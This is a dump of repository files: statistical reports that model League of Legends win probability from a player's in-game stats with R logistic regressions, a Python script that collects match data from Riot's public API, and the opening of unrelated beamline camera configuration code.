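\nFor reference, the counts in this table come from comparisons along these lines (as in the *Player A Analysis.R* file, where model7 is the final model and rbtestdata is the 42-game test set):\n\n    result7 <- predict(model7, rbtestdata, type=\"response\")\n    result7 <- as.numeric(result7 >= .5)          # 1 = predicted win\n    sum(result7 == rbtestdata$Winner.)            # 35 correct predictions\n    sum(result7 == 1 & rbtestdata$Winner. == 0)   # 4 losses predicted as wins\n    sum(result7 == 0 & rbtestdata$Winner. == 1)   # 3 wins predicted as losses\n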
This can be further verified by calculating a Cohen's Kappa statistic, which is meant to demonstrate how good a job the model does at predicting the correct outcome while also penalizing for the quantity of correct guesses that would be expected from random chance. A Kappa of less than zero means the model predicted worse than expected from random chance, while a Kappa of one means perfect prediction. The details of this calculation can be seen in Player A Analysis, the R code file. The resulting statistic is K = .5952. This is satisfyingly high, and is even higher than the Cohen's Kappa associated with Player T's data.\n\nConclusion\n==========\n\nOur final model is as follows:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced} / (1 + e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced})\n\nThis model does have a notable amount of predictive power for Player A's games, and it is reassuring to see WardsPlaced included, since that seems intuitive for the support role. The reappearance of DamageTaken1020 and Gold1020 from Player T's model adds an interesting element of confirmation, but at the same time may also raise concerns that those are products of kills and assists that are more accurately a reflection of a team being in the lead. Player A can take comfort that early game mistakes can be recovered from and early game leads are not a reason to be overzealous. Whether the increased number of wards placed is causing the team to be more likely to win, or whether he is more likely to remember to place wards when his team is already winning, the conclusion remains that reminding himself to place wards continually is clearly helpful to his team.\n\nIf nothing else, this model is a notable starting point for attempting more complicated models in the future, perhaps incorporating similar variables but across all members of a team to predict the outcome, or testing variables that also account for changes based on the champion selected (called an interaction effect.) There is a great deal of potential for more detailed, complicated modeling and many possible directions from which to tackle the question. At the very least, this analysis does suggest it may be possible and thus worth the time to attempt in the future.\n"
},
{
"alpha_fraction": 0.7353648543357849,
"alphanum_fraction": 0.7648663520812988,
"avg_line_length": 121.18079376220703,
"blob_id": "9dac8dc570a35a1ec53e83dfe1e02ca285516d0b",
"content_id": "6571cc75cca8a5f5b002bf214420f54f46ed06fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21626,
"license_type": "no_license",
"max_line_length": 1283,
"num_lines": 177,
"path": "/Player-T-Model/Report for Player T.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#League of Legends Project - Report for Player T\n#####Gabe Hinton\n\nSummary\n-------\n\nUsing Riot Games, Inc.'s public API a match history of 490 ranked games was pulled for a player referred to as Player T. For each of these games a number of variables were collected related to the player's behavior and actions during the game. A logistic regression was performed to explore whether any of these behaviors and actions, with an emphasis on behaviors during the early phases of the game, seemed to be closely related to eventually winning or losing the game. Long term, the goal of finding such models is to see if they can be generalized to fit more players, expand the models to account for more lurking variables, expand them to account for multiple players on a team, and ultimately to use them as a tool to help players identify areas of focus for improvement in their playing.\n\nObservations of games in which Player T was the Jungle or Support role were removed because the nature of those roles is so distinct from Top, Mid, and ADC that they would likely need a unique list of variables to have reasonable predictions.\n\nIt is important to also note the limits of this analysis from the outset, for example noting that League of Legends is first and foremost a team game, so problems immediately arise from trying to predict the outcome of the game looking at only one player on that team. In addition, it is difficult to claim causation from this analysis when a variable like gold, for example, could be increasing as a result of variables that were not considered, like number of kills. \n\nA logistic model was successfully made on a training data set of 300 observations. Surprisingly, the only significantly related variables to victory or loss were gold earned per minute from minutes ten to twenty and damage taken per minute from minutes ten to twenty. The model built was as follows:\n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n\nUsing a test data set of 60 observations, a Cohen's Kappa statistic was calculated to determine whether the model was predicting the outcome of the 60 games accurately beyond random chance. Cohen's Kappa was .327. It was predicting outcomes with more accuracy than would happen from normal chance, but not remarkably so. Gold earned per minute from minute ten to twenty and damage taken per minute from minute ten to twenty definitely have a relationship with victory, but it is not strong.\n\nPerhaps most interestingly, variables from minutes zero to ten of a match were not very related to victory at all. This suggests that Player T's early game performance does not have a strong impact on the outcome of the game, meaning he has room to make a comeback from a poor start, and should also avoid getting overzealous from an early lead.\n\n\nObjectives\n----------\n\nLeague of Legends is a Player versus Player online game created by Riot Games, Inc. in which two teams of five compete against each other to destroy towers and ultimately each other's bases. Riot has a public API from which anyone is allowed to pull data, typically for software developers who want to create apps all players can use to find statistics about champions or basic details about their own performance. Additionally, the API can be searched by player name, including a history of game matches. 
This match history typically also contains very detailed information for each player in the game, and for some categories even breaks the numbers down into ten minute chunks of the game. This analysis attempts to use that data to see whether a specific player's behavior and actions in the game, with an emphasis on the early phases of the game, can be modeled to reliably predict whether that player will win. \n\nData Summary\n------------\n\nThe API was used to search for the past 490 ranked games of a specific player (referred to as Player T,) and data was pulled for a variety of variables from each of those 490 games. The variables are as follows:\n\nChampion: An identification number for the character Player T chose to play as for that match \nCreeps010: The number of creeps Player T killed per minute across the first ten minutes of the match \nCreeps1020: The number of creeps Player T killed per minute from minute ten through twenty \nCreeps2030: The number of creeps Player T killed per minute from minute twenty through thirty \nDamageTaken010: The amount of damage Player T received per minute during the first ten minutes of the match \nDamageTaken1020: The amount of damage Player T received per minute from minute ten to twenty \nDamageTaken2030: The amount of damage Player T received per minute from minute twenty to thirty \nGold010: The amount of gold Player T earned per minute during the first ten minutes of the match \nGold1020: The amount of gold Player T earned per minute from minute ten to twenty \nGold2030: The amount of gold Player T earned per minute from minute twenty to thirty \nLane: The team \"position\" Player T played during the match \nMatchID: A number string identifying the match in Riot's API \nNeutralMinionsKilled: The number of neutral minions Player T killed throughout the game \nNeutralMinsEnemyJungle: The number of neutral minions Player T killed in enemy territory \nNeutralMinsTeamJungle: The number of neutral minions Player T killed in his own team's territory \nRole: \"Solo\" - mid or top lane as according to Lane; \"None\" - he played the \"Jungle\" role; \"Duo\\_Carry\" - ADC; \n \"Duo\\_Support\" - Support \nSightWardsBought: The number of sight wards Player T bought throughout the game \nTotalTimeCCDealt: The sum of all seconds an enemy player was stuck in a \"crowd control\" ability by Player T \nVisionWardsBought: The number of vision wards Player T bought throughout the game \nWardsKilled: The number of enemy wards Player T destroyed throughout the game \nWardsPlaced: The number of wards of any type Player T placed throughout the game \nWinner.: 1 if Player T's team won the game, 0 otherwise \nLost: 1 if Player T's team lost the game, 0 otherwise \n\nCertain additional variables could have been pulled from Riot's API but were deliberately omitted. While variables such as Kills, Assists, Inhibitor Kills, and Damage Dealt could each perhaps do a notable job of predicting whether Player T was the winner or loser, they are not very useful to the intent of the analysis. As a match in League of Legends nears its end, the team that ultimately wins typically gains momentum and begins to accumulate more kills, assists, and inhibitor kills than the team that loses. It seems highly likely that these variables can predict the winner, but that is because these are specifically the actions that cause a team to win in the first place. 
The goal of this analysis is to find player behaviors that less obviously could push a team to victory, as well as look at behavior that focuses more specifically on the early game through the API's time designations (\"010\", \"1020\", and \"2030\" variables.)\n\nOriginally this list of variables was chosen to provide a varied data set, but when setting out to begin a logical analysis, several variables were eliminated immediately. The Jungler role - designated \"None\" under Role - plays so differently from other positions that it was deemed to need a separate model. All three Creeps variables barely apply, and Jungler is the only role to which NeutralMinion variables apply in any meaningful way. With all this in mind, the NeutralMinion variables were omitted, and all observations from games in which Player T played the Jungler role were also omitted, leaving 436 observations. In addition, in League of Legends a team can forfeit once the game has lasted twenty minutes, which happens fairly frequently. This means all variables ending in 2030 had very many missing values. Deciding that the timed variables could just focus on the early portions of the game, all 2030 variables were omitted from analysis. Six of the 436 games also ended before twenty minutes had passed and thus were also missing the 1020 variables, so these six games were omitted from analysis because the sample size was still plenty large, and observations where the game ended before twenty minutes won't give us much information about typical player behavior.\n\nChampion, MatchID, Role, and Lane were all collected as a means of sorting data and were not actually included in the model. Role and Lane could certainly have been included to explore interaction effects, and there would be value in doing so in a future analysis. For a preliminary exploratory analysis, they were omitted for simplicity's sake.\n\nAnalysis\n--------\n\nLogistic regression will be the model used for this analysis. When the response variable consists of two values, success and failure (corresponding to wins and losses in this situation), this is called a binomial response. A typical linear regression model is not appropriate for a binomial response because, in a linear model, extreme values of the predictors can push the response anywhere from negative to positive infinity. A useful model here would output 1 for a game Player T is likely to win and 0 for a game Player T is likely to lose. A logistic regression accomplishes this - its output, called \"log-odds\", is not directly interpretable, but it can easily and consistently be transformed into a decimal between 0 and 1 representing a probability that Player T will win the game according to the model.\n\nThe model will begin with all of the variables remaining after the discussion in the Data Summary section, and these variables will be eliminated manually using a standard of alpha = .05 - that is, a variable with a p-value below .05 is considered significant, and anything else is a candidate for removal. In most cases at each step of the modeling process the variable with the highest p-value was removed, but in a few cases a variable with a slightly lower p-value was removed instead in favor of keeping a variable that seemed more intuitive to be a predictor. However, ultimately those variables were still removed, so this procedure had little impact on the final result.
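\nAs a rough sketch of one elimination step in R (model names here are illustrative; the full sequence is in the *Player T Analysis.R* file):\n\n    model1 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 +\n                  DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought +\n                  TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced,\n                  data = biztraindata, family = binomial)\n    summary(model1)                                    # inspect p-values\n    model2 <- update(model1, . ~ . - TotalTimeCCDealt) # drop the weakest term and refit\n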
Following this procedure, the first attempt at a model was as follows:\n\n    ## \n    ## Call:\n    ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, \n    ##     family = binomial, data = biztraindata)\n    ## \n    ## Deviance Residuals: \n    ##     Min       1Q   Median       3Q      Max  \n    ## -2.1941  -1.0034   0.5252   0.9237   1.8273  \n    ## \n    ## Coefficients:\n    ##                   Estimate Std. Error z value Pr(>|z|)    \n    ## (Intercept)     -2.3775643  0.7360210  -3.230 0.001237 ** \n    ## DamageTaken1020 -0.0021430  0.0006388  -3.355 0.000794 ***\n    ## Gold1020         0.0111569  0.0018478   6.038 1.56e-09 ***\n    ## ---\n    ## Signif. codes:  0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n    ## \n    ## (Dispersion parameter for binomial family taken to be 1)\n    ## \n    ##     Null deviance: 451.59  on 329  degrees of freedom\n    ## Residual deviance: 386.85  on 327  degrees of freedom\n    ## AIC: 392.85\n    ## \n    ## Number of Fisher Scoring iterations: 4\n\nSurprisingly, almost none of the variables were significant in predicting whether Player T would win or lose the game he was playing. Only two were: DamageTaken1020 and Gold1020.\n\nThis result was a bit disappointing - these two variables raise similar concerns as Kills and Assists would: as a team gains momentum, the damage its players take decreases and the gold they earn increases dramatically, so there is a legitimate concern that the model is not so much predicting a win as detecting that a team has already done what it needs to do to be getting close to winning.\n\nKnowing that this analysis is ultimately informal because of perhaps infinite lurking variables, I continued brainstorming and eventually realized that, much like Jungler, Support also has a highly unique playstyle and would have very different values for most of these variables than the more \"typical\" roles often called \"Top\", \"Mid\", and \"ADC.\" So modeling was attempted again with all games in which Player T played the support role removed, leaving 360 observations. This time, to also assess the accuracy of the model's predictive power, the data was split into a training and a test set. 300 observations were randomly selected to train the model, and the remaining 60 observations were set aside to assess how accurately the model would predict whether the 60 games were wins or losses.\n\nThe procedure for selecting variables was the same as before, and the final model was as follows:\n\n    ## \n    ## Call:\n    ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, \n    ##     family = binomial, data = biztraindata2)\n    ## \n    ## Deviance Residuals: \n    ##     Min       1Q   Median       3Q      Max  \n    ## -2.2003  -0.9837   0.4908   0.9559   1.9053  \n    ## \n    ## Coefficients:\n    ##                   Estimate Std. Error z value Pr(>|z|)    \n    ## (Intercept)     -3.0985030  0.7928645  -3.908 9.31e-05 ***\n    ## DamageTaken1020 -0.0016186  0.0006565  -2.466   0.0137 *  \n    ## Gold1020         0.0118372  0.0019267   6.144 8.05e-10 ***\n    ## ---\n    ## Signif. codes:  0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n    ## \n    ## (Dispersion parameter for binomial family taken to be 1)\n    ## \n    ##     Null deviance: 412.47  on 299  degrees of freedom\n    ## Residual deviance: 351.13  on 297  degrees of freedom\n    ## AIC: 357.13\n    ## \n    ## Number of Fisher Scoring iterations: 4\n\nSurprisingly, the exact same variables were left significant as before, with only slight changes to the coefficients. If the data for these variables is plotted, this seems reasonably intuitive.
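\nThe scatter plot below was generated along these lines with ggplot2 (adapted from the *Player T Analysis.R* file):\n\n    library(ggplot2)\n    ggplot(biztraindata2, aes(Gold1020, DamageTaken1020)) +\n      geom_point(aes(color = as.factor(Winner.))) +\n      scale_color_manual(name = \"Outcome\", labels = c(\"Lost\", \"Won\"),\n                         values = c(\"red\", \"blue\"))\n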
\n\n\n\nBlue points are games that Player T won, and red points are games he lost. We can see a trend that more wins (blue points) are found as we go further down and to the right on the plot, exactly as we expect. (Remember that smaller values of Damage Taken are preferred.) There are exceptions at the extremes, and more of a mix of points around the middle of the plot, which is also expected. There are a multitude of variables not considered in the analysis, so we do not expect to be able to predict perfectly and account for all variation.\n\nTo interpret the model, note that each coefficient is the amount added to the \"log-odds\" for a unit increase in the corresponding variable. Thus the model is:\n\nLog-odds = -3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020\n\nWe can convert log-odds to odds by simply taking *e^{estimate}* where *estimate* is the number in the Estimate column of the table. Note that odds and probability of winning are not exactly the same thing. Odds are the ratio of {Probability of Success} divided by {Probability of Failure}. \n\nThus, specifically, for each increase of one damage taken per minute from minutes ten to twenty in the game - or ten total damage taken from minutes ten to twenty - Player T's odds of winning will be multiplied by *e^{-.00162} = .998*. We can interpret this as probability with a bit more math. Probability = Odds / (1 + Odds). If we plug the mean of Gold1020 into the formula and calculate the result at each point on the range of DamageTaken1020, we can graph how the predicted probability of winning changes as DamageTaken1020 changes. The axis for damage taken will only cover the range observed in the data to avoid drawing bad conclusions by assuming behavior not actually seen.\n\n\n\nAgain, note that this graph is only specific to when Gold1020 is at its average level. The general trend will be similar for most values, however.\n\nFor each additional gold earned per minute from minutes ten to twenty - about ten total gold across that window - Player T's odds of winning will be multiplied by *e^{.0118} = 1.012*. Put into perhaps a more interesting and relatable interpretation, if Player T earns an additional 1000 gold during minutes ten to twenty of the game, his odds (not probability, remember) of winning are predicted to be multiplied by *e^{1.184} = 3.267*, which is a much more notable increase, with 1000 gold still being a very attainable goal. This time, by plugging in DamageTaken1020 at its mean value we can plot how the predicted probability of winning changes as Gold1020 changes.\n\n\n\n\nAt this point it is worthwhile to note that a model suggesting a relationship between these variables is not in itself sufficient to suggest that having more gold and taking less damage directly cause Player T to be more likely to win. There are plenty of other difficult-to-quantify variables at play in a PvP game, and as already mentioned, gold and damage taken could also just be the result (much like victory or loss themselves) of other player behaviors that also happen to cause the player to be more or less likely to win the game. Care must be taken to not assume that the results are as simple as earning more gold in a game directly causing Player T to be more likely to win. For example, maybe Player T has more gold because he killed more enemy players, which is also putting his team in a map position to take objectives and ultimately destroy the enemy base. The gold itself might not be what helps Player T win - it could be a side effect of the unknown behaviors that actually help Player T's team win.
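\nBefore moving to the test set, the odds multipliers quoted above can be double-checked numerically (a sketch; the coefficients come from the model output above):\n\n    exp(-0.0016186)       # ~0.998 per +1 damage taken per minute\n    exp(0.0118372)        # ~1.012 per +1 gold per minute (about ten total gold)\n    exp(0.0118372 * 100)  # ~3.27 per +100 gold per minute (about 1000 total gold)\n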
Moving forward, this exact model was used to calculate the probability of Player T winning a game based on the Gold1020 and DamageTaken1020 variables from the 60-observation test data set. The responses were transformed into a probability of winning the game, and then probabilities greater than .5 were considered to be predicting victory and less than .5 were considered to be predicting a loss. Then the model's prediction and the actual result were compared. The table below shows the results:\n\n| | Model Predicts Victory | Model Predicts a Loss |\n|----------------|------------------------|-----------------------|\n| Actual Victory | 23 | 10 |\n| Actual Loss | 10 | 17 |\n\nThe first thing to note is that of the games the model predicted incorrectly, exactly half were wins and half were losses. This means the errors appear to be truly random, which is one of the assumptions of an effective model. It only predicted two-thirds of the games correctly, but with so few variables this is not so surprising - it is clear that while there is a trend of relationships between these variables, it is far from perfect.\n\nTo quantify a bit more reliably, rather than simply concluding the model was accurate 66.7% of the time, the Cohen's Kappa statistic will be used. This statistic is intended to reflect the accuracy of model predictions but give a penalty to the result based on how often the model would be expected to predict correctly by chance, specifically based on proportions in the data set in question. A Cohen's Kappa less than zero means the model predicted worse than we would expect from chance, and greater than zero means better than we expect from chance, with 1 meaning perfect prediction. Details of the Cohen's Kappa calculation can be found in the R code file, and the resulting Kappa was .327. Clearly the model is predicting better than chance, but again the relationship is not perfect and the accuracy of predictions is still limited.\n\nConclusion\n----------\n\nLooking at the gold earned and damage taken in one of Player T's League of Legends matches can give a prediction of whether Player T will win or lose more often than just guessing from random chance. The model created to do so is as follows:\n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n\nHowever, it does not increase the accuracy of predictions by a remarkable amount, so while a relationship between gold earned and damage taken in minutes ten to twenty of a game and the outcome of the game does exist, it is not a very strong relationship. Unfortunately we cannot also conclude that deliberately increasing gold earned or decreasing damage taken will directly result in Player T being more likely to win, although in context this is certainly intuitive, so it is not out of the question.\n\nAlso, it must be recognized that League of Legends is primarily a team game, so there are innate limitations to looking at the behavior of only one player in the game when predicting the outcome.\n\nPerhaps most interestingly, the variables related to the first ten minutes of the game did not help predict the outcome of the game at all.
While it is likely an extremely poor or successful early phase of the game would make victory more or less likely, the model does suggest that generally early game performance is not very related to the eventual outcome. Player T can take heart that a comeback is possible after the first ten minutes, and additionally should be careful to not be overzealous just because of an early lead.\n"
},
{
"alpha_fraction": 0.5411405563354492,
"alphanum_fraction": 0.5527958869934082,
"avg_line_length": 51.992645263671875,
"blob_id": "2b4d10b1bf4dbe7596de8dd8531b4d17b053e52a",
"content_id": "6122618a26ae895a3ad578c9199c18238b24dc61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7207,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 136,
"path": "/Python-API-Data-Compiler/Code.py",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas\nimport numpy\nimport time\nfrom pandas.io.json import json_normalize\n\n# The JSON from request_summoner_number doesn't contain much information. It will be primarily used to convert the\n# summoner's name into their Riot ID number.\n\n# BE SURE to enter your API Key in the appropriate blank within __main__!\n\ndef request_summoner_number(region, summoner_name, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v1.4/summoner/by-name/\"+summoner_name+\n \"?api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\n# This huge JSON array will be a full match history of the player. The only useful information we will extract\n# are the match IDs, for now of the most recent 200 games.\n\n\ndef get_match_ids(region, summoner_number, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v2.2/matchlist/by-summoner/\"+summoner_number+\n \"?api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\n# An even bigger JSON containing all the information for a given match. We need to identify which number 1-10\n# the summoner we're interested in was assigned, and then pull the corresponding data we want from them.\n\n\ndef get_match_json(match_id, region, api_key):\n url = (\"https://\"+region+\".api.pvp.net/api/lol/\"+region+\"/v2.2/match/\"+match_id+\n \"?includeTimeline=true&api_key=\"+api_key)\n response = requests.get(url)\n return response.json()\n\n\ndef main():\n print \"\\nData Gathering Tool v0.1\"\n print \"Enter your region from the following list:\"\n print \"na euw eune lan br kr las oce tr ru pbe\\n\"\n\n # Be sure to put YOUR API_key in this blank before running the program.\n\n api_key = ''\n region = str(raw_input('Region (lower case):'))\n summoner_name = str(raw_input('Summoner Name IN LOWER CASE:'))\n\n # This request is to convert the summoner name to the summoner ID number.\n\n request1_json = request_summoner_number(region, summoner_name, api_key)\n print request1_json\n\n summoner_number = request1_json[summoner_name]['id']\n summoner_number = str(summoner_number)\n in_game_name = request1_json[summoner_name]['name']\n\n # This request is for the full match history.\n\n request2_json = get_match_ids(region, summoner_number, api_key)\n print request2_json\n\n match_id_list = json_normalize(request2_json['matches'])\n match_id_list = match_id_list['matchId']\n\n print match_id_list\n\n full_data = pandas.DataFrame()\n\n for n in xrange(0, 490):\n\n match_json = get_match_json(match_id=str(match_id_list[n]), region=region, api_key=api_key)\n print match_json\n\n # This is the draft for pulling the data I want out of the match JSON.\n\n for i in xrange(0, 9):\n if match_json['participantIdentities'][i]['player']['summonerName'] == in_game_name:\n match_participant_id = i+1\n\n new_data = pandas.DataFrame({'MatchID': match_id_list[n],\n 'Winner?': [match_json['participants'][match_participant_id-1]['stats']['winner']],\n 'Role': [match_json['participants'][match_participant_id-1]['timeline']['role']],\n 'Lane': [match_json['participants'][match_participant_id-1]['timeline']['lane']],\n 'Champion': [match_json['participants'][match_participant_id-1]['championId']],\n 'Gold010': match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'Gold1020': match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'Gold2030': 
match_json['participants'][match_participant_id-1]\n ['timeline']['goldPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'Creeps010': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'Creeps1020': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'Creeps2030': match_json['participants'][match_participant_id-1]\n ['timeline']['creepsPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'DamageTaken010': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('zeroToTen', numpy.nan),\n 'DamageTaken1020': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('tenToTwenty', numpy.nan),\n 'DamageTaken2030': match_json['participants'][match_participant_id-1]\n ['timeline']['damageTakenPerMinDeltas'].get('twentyToThirty', numpy.nan),\n 'SightWardsBought': [match_json['participants'][match_participant_id-1]['stats']\n ['sightWardsBoughtInGame']],\n 'VisionWardsBought': [match_json['participants'][match_participant_id-1]['stats']\n ['visionWardsBoughtInGame']],\n 'WardsPlaced': [match_json['participants'][match_participant_id-1]['stats']\n ['wardsPlaced']],\n 'WardsKilled': [match_json['participants'][match_participant_id-1]['stats']\n ['wardsKilled']],\n 'TotalTimeCCDealt': [match_json['participants'][match_participant_id-1]['stats']\n ['totalTimeCrowdControlDealt']],\n 'NeutralMinionsKilled': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilled']],\n 'NeutralMinsTeamJungle': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilledTeamJungle']],\n 'NeutralMinsEnemyJungle': [match_json['participants'][match_participant_id-1]['stats']\n ['neutralMinionsKilledEnemyJungle']]})\n\n set_data = [full_data, new_data]\n\n full_data = pandas.concat(set_data)\n\n print full_data\n\n time.sleep(1.5) # So you won't go over your api_key rate limit\n\n\n full_data.to_csv('%s_history.csv' % summoner_name)\n\nif __name__ == \"__main__\":\n main()\n"
}
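One operational note on the collector above: it avoids rate limits with a fixed 1.5-second sleep between requests. A sketch of a retry-with-backoff wrapper that reacts to HTTP 429 instead; the helper name is hypothetical, and the long-retired pvp.net endpoints appear here only as the URLs being fetched.

import time
import requests

def get_json_with_retry(url, max_attempts=5, base_delay=1.5):
    # Retry on HTTP 429 (rate limited) with a linearly growing delay.
    for attempt in range(max_attempts):
        response = requests.get(url)
        if response.status_code == 429:
            time.sleep(base_delay * (attempt + 1))
            continue
        response.raise_for_status()
        return response.json()
    raise RuntimeError('rate limited on every attempt: ' + url)

Each of the three request helpers in Code.py could call this in place of its bare requests.get(url).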
] | 9 |
mrakitin/profile_collection-srx
|
https://github.com/mrakitin/profile_collection-srx
|
cf0e60738f9c4bbfc386c4e92fa114d02a4a022c
|
639f0a73e8d8db3e07b7278545714c65e3d043c4
|
5b46f06d73130221797e4bbf55caf657f80629c6
|
refs/heads/master
| 2021-07-02T10:39:34.785683 | 2020-08-31T22:38:11 | 2020-08-31T22:38:11 | 209,174,734 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5816078186035156,
"alphanum_fraction": 0.6099269390106201,
"avg_line_length": 35.488887786865234,
"blob_id": "b083675607ecb1b616109c2f11353af44abc8d5f",
"content_id": "011a632321fe8fb6ef56b12f28bdf10050162203",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3284,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 90,
"path": "/startup/21-cameras.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f'Loading {__file__}...')\n\n\nimport sys\nfrom ophyd.areadetector import (AreaDetector, ImagePlugin,\n TIFFPlugin, StatsPlugin,\n ROIPlugin, TransformPlugin,\n OverlayPlugin, ProcessPlugin)\nfrom ophyd.areadetector.filestore_mixins import (FileStoreIterativeWrite,\n FileStoreTIFF)\nfrom ophyd.areadetector.trigger_mixins import SingleTrigger\nfrom ophyd.areadetector.cam import AreaDetectorCam\nfrom ophyd.device import Component as Cpt\n\n\n# BPM Camera\nclass SRXTIFFPlugin(TIFFPlugin,\n FileStoreTIFF,\n FileStoreIterativeWrite):\n file_number_sync = None\n\n\nclass BPMCam(SingleTrigger, AreaDetector):\n cam = Cpt(AreaDetectorCam, 'cam1:')\n image_plugin = Cpt(ImagePlugin, 'image1:')\n\n # tiff = C(SRXTIFFPlugin, 'TIFF1:',\n # #write_path_template='/epicsdata/bpm1-cam1/2016/2/24/')\n # #write_path_template='/epicsdata/bpm1-cam1/%Y/%m/%d/',\n # #root='/epicsdata', reg=db.reg)\n # write_path_template='/nsls2/xf05id1/data/bpm1-cam1/%Y/%m/%d/',\n # root='/nsls2/xf05id1')\n roi1 = Cpt(ROIPlugin, 'ROI1:')\n roi2 = Cpt(ROIPlugin, 'ROI2:')\n roi3 = Cpt(ROIPlugin, 'ROI3:')\n roi4 = Cpt(ROIPlugin, 'ROI4:')\n stats1 = Cpt(StatsPlugin, 'Stats1:')\n stats2 = Cpt(StatsPlugin, 'Stats2:')\n stats3 = Cpt(StatsPlugin, 'Stats3:')\n stats4 = Cpt(StatsPlugin, 'Stats4:')\n # this is flakey?\n # stats5 = C(StatsPlugin, 'Stats5:')\n\n\nbpmAD = BPMCam('XF:05IDA-BI:1{BPM:1-Cam:1}', name='bpmAD', read_attrs=[])\nbpmAD.read_attrs = ['stats1', 'stats2', 'stats3', 'stats4']\nbpmAD.stats1.read_attrs = ['total']\nbpmAD.stats2.read_attrs = ['total']\nbpmAD.stats3.read_attrs = ['total']\nbpmAD.stats4.read_attrs = ['total']\n\n\n# HF VLM\n# Does this belong here or in microES?\nclass SRXHFVLMCam(SingleTrigger, AreaDetector):\n cam = Cpt(AreaDetectorCam, 'cam1:')\n image_plugin = Cpt(ImagePlugin, 'image1:')\n proc1 = Cpt(ProcessPlugin, 'Proc1:')\n stats1 = Cpt(StatsPlugin, 'Stats1:')\n stats2 = Cpt(StatsPlugin, 'Stats2:')\n stats3 = Cpt(StatsPlugin, 'Stats3:')\n stats4 = Cpt(StatsPlugin, 'Stats4:')\n roi1 = Cpt(ROIPlugin, 'ROI1:')\n roi2 = Cpt(ROIPlugin, 'ROI2:')\n roi3 = Cpt(ROIPlugin, 'ROI3:')\n roi4 = Cpt(ROIPlugin, 'ROI4:')\n over1 = Cpt(OverlayPlugin, 'Over1:')\n trans1 = Cpt(TransformPlugin, 'Trans1:')\n tiff = Cpt(SRXTIFFPlugin, 'TIFF1:',\n write_path_template='/epicsdata/hfvlm/%Y/%m/%d/',\n root='/epicsdata')\n\n\ntry:\n hfvlmAD = SRXHFVLMCam('XF:05IDD-BI:1{Mscp:1-Cam:1}',\n name='hfvlm',\n read_attrs=['tiff'])\n hfvlmAD.read_attrs = ['tiff', 'stats1', 'stats2', 'stats3', 'stats4']\n hfvlmAD.tiff.read_attrs = []\n hfvlmAD.stats1.read_attrs = ['total']\n hfvlmAD.stats2.read_attrs = ['total']\n hfvlmAD.stats3.read_attrs = ['total']\n hfvlmAD.stats4.read_attrs = ['total']\nexcept TimeoutError:\n hfvlmAD = None\n print('\\nCannot connect to HF VLM Camera. Continuing without device.\\n')\nexcept Exception as ex:\n hfvlmAD = None\n print('\\nUnexpected error connecting to HF VLM Camera.\\n')\n print(ex, end='\\n\\n')\n"
},
{
"alpha_fraction": 0.5538293719291687,
"alphanum_fraction": 0.5595530271530151,
"avg_line_length": 25.207143783569336,
"blob_id": "4917b0515fe48a77b4e81fb71668b3c943f4ff43",
"content_id": "5d7ecd6c2064f94bba6e9b85db8cb115d78668e1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3669,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 140,
"path": "/startup/53-slitscans.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
